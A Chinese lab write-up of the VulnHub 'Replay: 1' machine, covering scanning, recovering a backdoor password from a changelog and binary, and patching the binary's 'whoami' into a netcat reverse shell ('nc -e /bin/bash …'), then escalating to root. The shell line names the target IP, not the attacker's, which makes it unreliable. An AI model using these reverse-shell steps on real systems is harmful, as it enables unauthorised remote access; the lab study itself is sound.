靶機環境
- 靶機(Linux): 192.168.40.137
- 攻擊機(Kali): 192.168.40.129
下載下傳位址:https://www.vulnhub.com/entry/replay-1,278/
滲透過程
按照慣例,得先找到對方IP,是以
nmap192.168.40.0/24
掃描一下
找到靶機的IP為192.168.40.137,開啟了兩個端口,ssh和http
打開網頁檢視一下
在源代碼中發現了一條注釋的内容,暫時不知道有什麼用,是以先放着
按照流程,接下來應該爆破目錄了
dirb http://192.168.40.137/ /usr/share/dirb/wordlist/comment.txt
複制
找到網站是存在robots.txt這個檔案的
掃描子目錄的多少和字典有關系,有的robots.txt中會存在一些掃描不到的東西,是以還是有通路價值的),通路後發現根目錄下有一個
.zip
檔案
下載下傳下來後解壓,看到有兩個檔案
changelog.txt
是更新日志,先看一下網站的更新内容,打開檔案後發現檔案部分内容為base64編碼,拎去解碼後的明文如下
從4個版本中可以看到,這個作者在網站中建立了一個後門程式,用于他自己連接配接,這個後門程式是
python2.7
版本寫的,
寫死
成了
.bin
檔案,是以我們也可以順便利用一下,
./client.bin
後發現需要輸入密碼
用vim打開.bin檔案後,
/password
搜尋找到了2nd(第二部分)的密碼,故而猜測是和前面P1拼接在一起的,回頭複制粘貼拼接密碼
密碼:qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
複制
有了賬号密碼後,運作.bin檔案 輸入了IP和密碼後,發現執行了一條
whoami
指令,這部分應該是寫進.bin裡面的
是以vim進入
client.bin
,查找
whoami
找到了執行指令的這一部分,那麼就可以開始反彈shell了,因為是寫死的緣故,是以字元數量必須和之前的一樣,否則不能運作,就好比,100個字元的檔案,不論怎麼修改,最後都隻能100字元,否則就無法運作;那麼我們先構造反彈的語句
nc -e /bin/bash 192.168.40.137 4444
複制
為了程式能正常運作,是以我們得把前面的一些字元串删除,以此來達到“平衡” 在Python中計算反彈語句的長度為
35
原先的指令
whoami
為6位,是以我們得向前删除29位,最後的樣子是這個
接着在Kali中開啟監聽
nc -lvp 4444
複制
開啟完成後,運作後門程式,觸發shell
得到shell後,開始提權
在
/home/bob/Document/.ftp/
目錄下發現了一個
.user.passwd
cat檢視後,找到了bob的密碼,直接
sudu su
輸入密碼就切換成了root
最後,在根目錄下發現flag.txt,
cat flag.txt
擷取flag,完成
總結
這個靶機在進入系統後的提權簡直弱智,就像是為了增加這麼一個環節而強行增加上去的一樣,毫無技術含量,你能找得到檔案就能提權,找不到就萬年
bob
,前面後門程式部分還是挺有意思的
本文參與 騰訊雲自媒體分享計劃,歡迎熱愛寫作的你一起參與!
本文章分享自微信公衆号
E條鹹魚
作者:現在你看到我的ID了
原始發表時間:2019-05-09
如有侵權,請聯系 [email protected] 删除。